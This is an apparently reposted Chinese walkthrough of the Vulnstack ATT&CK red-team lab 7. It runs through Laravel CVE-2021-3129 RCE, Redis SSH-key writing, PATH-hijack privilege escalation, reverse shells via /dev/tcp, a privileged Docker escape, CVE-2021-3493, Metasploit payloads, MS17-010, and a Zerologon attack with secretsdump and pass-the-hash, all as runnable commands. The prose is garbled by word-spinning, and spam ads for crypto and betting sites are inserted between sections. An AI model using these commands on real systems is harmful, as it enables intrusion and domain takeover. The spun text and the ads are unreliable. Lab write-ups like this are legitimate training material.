前言

这个靶场是红日的ATT&CK实战系列-红队评估(七)

链接如下:http://vulnstack.qiyuanxuetang.net/vuln/detail/9/

这个靶场兜兜转转弄了挺多次,大佬轻喷~~

攻击图如下:

由于环境问题,我将DMZ区的ubuntu设置为NAT模式

Web1 IP为192.168.213.188

Kali IP:192.168.213.170

环境信息

DMZ区的 Ubuntu 需要启动redis和nginx服务:

sudo redis-server /etc/redis.conf

sudo /usr/ *** in/nginx -c /etc/nginx/nginx.conf

sudo iptables -F

第二层网络的 Ubuntu需要启动docker容器:

sudo service docker start

sudo docker start 8e172820ac78

第三层网络的 Windows 7 (PC 1)需要启动通达OA:

C:\MYOA\bin\AutoConfig.exe


域用户信息
域用户账户和密码如下:

Administrator:Whoami2021

whoami:Whoami2021

bunny:Bunny2021

moretz:Moretz2021

Ubuntu 1:

web:web2021

Ubuntu 2:

ubuntu:ubuntu

通达OA账户:

admin:admin657260

外网渗透

Laravel Debug mode RCE(CVE-2021-3129)

首先拿到一个IP地址:192.168.213.188

第一步固然是先举行端口扫描啦!

开放22,80,81,6379端口

接见80端口发现是一个博客网站,暂时没啥思绪

接见81端口发现是Laravel框架且版本是Laravel v8.29.0 (PHP v7.4.14)

正好这个框架爆了一个远程代码执行破绽,我这里直接使用工具举行Getshell

毗邻乐成

工具链接:https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP

简朴举行了信息网络,发现是一个docker环境,ip是172段

hostname
cat /etc/hosts
cat /proc/1/cgroup

实验反弹shell到Kali上再举行提权

Kali举行监听,然则最后没有反映

实验了MSF的tcp、http均不行,故判断为不出网

Redis未授权

既然反弹不了shell,只能从其他地方举行入手了

之前举行端口扫描时发现该机械开着6379,实验Redis弱口令或未授权接见

实验举行毗邻Redis,毗邻乐成,存在未授权接见

实验写入SSH公钥

ssh-keygen -t rsa ,天生公钥
(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt ,将公钥导入foo.txt文件
cat foo.txt | redis-cli -h 192.168.213.170 -p 6379 -x set hello ,把foo.txt文件内容写入目的主机的redis缓冲中
config set dir /root/.ssh    , 设置redis的备份路径为/root/.ssh/
config set dbfilename authorized_keys    , 设置保留文件名为authorized_keys
save    , 将数据保留在目的服务器硬盘上
ssh 192.168.213.188 , 毗邻

乐成举行毗邻,简朴举行了信息网络,发现存在52段

由于之前的shell反弹不了,以是看一下nginx的设置文件是不是做了反向署理

81端口的反弹不到kali,只能穷苦一点使用ubuntu做为跳板机举行操作

首先举行反弹shell到ubuntu:192.168.52.10

当前权限为www,So,先举行提权

环境变量提权

不知道是不是由于docker环境的缘故原由,实验内核提权失败

既然云云,就实验搜索寻找带有SUID的文件

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null

发现home目录下的谁人shell有点可疑,先执行看看会发生什么~

通过执行发现该剧本执行了PS下令且并未使用绝对路径,源码在demo.c中可以清晰看到

那么我们实验更改$PATH来执行我们的恶意程序,从而获得目的主机的高权限shell

cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH 
export PATH=/tmp:$PATH , 将/tmp添加到环境变量中,而且先加载执行/tmp里的程序
cd /home/jobs
./shell

乐成获得root权限,把shell再反弹到ubuntu(web 1)中

bash -c 'exec bash -i &>/dev/tcp/192.168.52.10/1239 <&1'

前面说到这是个docker环境,现实IP为192.168.52.20,以是我们要举行docker逃逸

刚最先实验的是CVE-2019-5736 runc容器逃逸破绽,在运行./main并在Web 2进入docker环境,但ubuntu监听处没有任何反映,只好作罢,实验另外一种逃逸方式

特权模式逃逸

原理

使用特权模式启动容器,可以获取大量装备文件接见权限。由于当治理员执行docker run —privileged时,Docker容器将被允许接见主机上的所有装备,并可以执行mount下令举行挂载

破绽行使

fdisk -l ,查看磁盘文件
ls /dev ,查看装备文件

有三个磁盘文件和N个装备文件,我们将/dev/sda1挂载到自己确立的文件夹

mkdir hello
mount /dev/sda1 /hello
ls /hello

挂载乐成,写入设计义务

echo '* * * * * bash -i >& /dev/tcp/192.168.52.10/1233 0>&1' >> /hello/var/spool/cron/root

等了好一会,但照样没有反映0.0

换另一个思绪,翻一下看看可不能以接见root目录或查看home有没有用户

可以看到有ubuntu这个用户

接下来就可以将我们自己天生的ssh秘钥写入到/hello/home/ubuntu/.ssh目录中的authorized_keys文件中,写入乐成之后就可以使用该密钥举行上岸该机械

ssh-keygen -f hello
chmod 600 hello ,赋予权限
cp -avx /hello/home/ubuntu/.ssh/id_rsa.pub /hello/home/ubuntu/.ssh/authorized_keys ,-avx是将权限也一起复制

echo > /hello/home/ubuntu/.ssh/authorized_keys ,清空authorized_keys文件

echo '天生的.pub文件的内容' > /hello/home/ubuntu/.ssh/authorized_keys ,将ssh秘钥写入authorized_keys文件

cat /hello/home/ubuntu/.ssh/authorized_keys ,查看是否写入乐成

ssh -i hello ubuntu@192.168.52.20

乐成登录,查看了一下网络,发现还存在93网段

CVE-2021-3493

linux kernel一样平常指Linux内核。Linux是一种开源电脑操作系统内核。它是一个用C语言写成,相符POSIX尺度的类Unix操作系统。
linux内核中的overlayfs文件系统中没有准确地验证用户名称空间和底层文件系统中文件功效的设置。由于非特权用户名称空间和Ubuntu内核中允许非特权笼罩的补丁的组合,攻击者可以使用它来获得更高的特权。

破绽影响版本

Ubuntu 20.10
Ubuntu 20.04 LTS
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS
Ubuntu 14.04 ESM

由于登录的是ubuntu用户,恰好今年ubuntu机械出了一个内核提权破绽,该机械在影响局限内

So,先举行提权

,

USDT线上交易

U交所(www.9cx.net)是使用TRC-20协议的Usdt官方交易所,开放USDT帐号注册、usdt小额交易、usdt线下现金交易、usdt实名不实名交易、usdt场外担保交易的平台。免费提供场外usdt承兑、低价usdt渠道、Usdt提币免手续费、Usdt交易免手续费。U交所开放usdt otc API接口、支付回调等接口。

,

进入到tmp目录

vim exploit.c ,将下载的exploit.c的内容粘贴到该文件中
gcc exploit.c -o exploit ,编译
chmod +x exploit
./exploit

Exp:https://github.com/briskets/CVE-2021-3493

乐成提权,那么接下来该将这两台机械上线MSF继续进攻内网了

内网渗透

先举行上线通过Redis拿到的机械

添加路由

run get_local_subnets
run autoroute -s 192.168.52.0 -n 255.255.255.0
run autoroute -p

由于在Web 1这台机械上通过实验该机械安装有python3.6.9,那么我们可以将木马上传到Web 1,通过python3开启一个http服务,使用Web 2举行下载并运行我们的木马

首先MSF天生木马,通过MSF上传到Web 1中

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=2020 -f elf -o 20.elf
sessions 1
upload /root/20.elf /tmp/20.elf

乐成上线

存活扫描

先举行扫描52段另有没有其他存活主机

可以看到并没有其他存活主机

由于Web 2存在一个93网段,以是举行扫描一下93段的存活主机

在扫着扫着,session突然就掉了,重新上线一下

发现两台机械且存在域,其中30八九不离十为域控

[+] 192.168.93.30 [DC] OS:Windows Names:(DC, WHOAMIANONY) Addresses:(192.168.93.30) Mac:00:0c:29:72:b5:3e Virtual Machine:VMWare
[+] 192.168.93.40 [PC2] OS:Windows Names:(PC2, WHOAMIANONY, __MSBROWSE__) Addresses:(192.168.93.40, 169.254.129.186) Mac:00:0c:29:28:d5:fe Virtual Machine:VMWare

使用SMB_VERSION模块效果也是一样

MS17-010

进内网一定举行测试的破绽

可以看到两台机械均存在ms17010

举行攻击DC上线的时刻会话确立失败,然则可以使用下令执行模块举行执行下令

使用MS17010下令执行模块举行信息网络

到此可以确定192.168.93.30确实为域控

域控这个先放一放,看看WIn7机械能不能举行上线

使用msf的模块举行攻击,但照样失败,换方程式破绽行使工具举行打

先用MSF天生dll文件

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=443 -f dll > x64.dll

MSF开启SOCKS署理

use auxiliary/server/socks_proxy
exploit

设置好署理

将x64.dll放到工具目录替换原来的,MSF设置好监听

Win7乐成上线,然则呢域控照样不行

抓了密码并没有发现域管账号,且运行程序没有是使用域管账号运行的,那么说明域管并未登录过该机械

先把密码信息用得上的复制出来

SID: S-1-5-21-1315137663-3706837544-1429009142-1115
hostname: PC2
* Username : moretz
* Domain   : WHOAMIANONY
* Password : Moretz2021

emmm,既然域控可以执行下令,那么上传木马到Win7,使用copy下令举行复制到域控,然则并没有乐成

先实验域内提权破绽吧

CVE-2020-1472

简介

攻击者通过NetLogon(MS-NRPC),确立与域控间易受攻击的平安通道时,可行使此破绽获取域管接见权限。乐成行使此破绽的攻击者可以在该网络中的装备上运行经特殊设计的应用程序

检测

vim /etc/proxychains.conf ,设置署理
proxychains python3 zerologon_tester.py DC 192.168.93.30

显示success示意破绽存在

剧内陆址:https://github.com/SecuraBV/CVE-2020-1472

破绽行使

将域控密码置空

proxychains python3 cve-2020-1472-exploit.py DC 192.168.93.30

使用impacket中的工具将域控的密码dump下来

proxychains python3 secretsdump.py WHOAMIANONY.ORG/DC\$@192.168.93.30 -just-dc -no-pass

获得hash之后,使用MSF PSEXEC模块上线

use exploit/windows/ *** b/psexec
set SMBUser administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec
set payload windows/meterpreter/bind_tcp
set rhost 192.168.93.30
run/exploit

然则并没有返回会话,估量是防火墙的缘故原由,使用MS17010下令执行模块举行关闭

netsh advfirewall set allprofiles state off

上线乐成

恢复域控Hash

重点:一定恢复域控hash,否则会导致脱域

执行以下下令,获取目的原始hash

使用msf举行天生

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

下载到Kali中

下载完成之后举行删除

del /f system.save
del /f sam.save
del /f security.save

查看域控hash

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

使用剧本恢复hash

proxychains python3 reinstall_original_pw.py DC 192.168.93.30 7fd0cca5eafe480f617b04039bbf115c

使用空密码毗邻举行验证是否恢复

乐成恢复

结言

显著已经开启了,不知道为什么PC 1扫描存活的时刻就是扫不出来,网卡也是设置一样的,行使DC也接见不到~~~

最终拿下机械如下

权限维持就不做了,写完文章也挺晚了~~~

万利逆商

万利逆商网(www.ipfs8.vip)是FiLecoin致力服务于使用FiLecoin存储和检索数据的官方权威平台。IPFS网实时更新FiLecoin(FIL)行情、当前FiLecoin(FIL)矿池、FiLecoin(FIL)收益数据、各类FiLecoin(FIL)矿机出售信息。并开放FiLecoin(FIL)交易所、IPFS云矿机、IPFS矿机出售、租用、招商等业务。

今日济南新闻声明:该文看法仅代表作者自己,与今日济南新闻无关。转载请注明:足球贴士(www.zq68.vip):Vulnstack内网靶场渗透纪录
发布评论

分享到:

逆熵官网(www.ipfs8.vip):被杜淳追求却拒绝,转身广告大张伟,随后和相识38天富豪娶亲
你是第一个吃螃蟹的人
发表评论

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。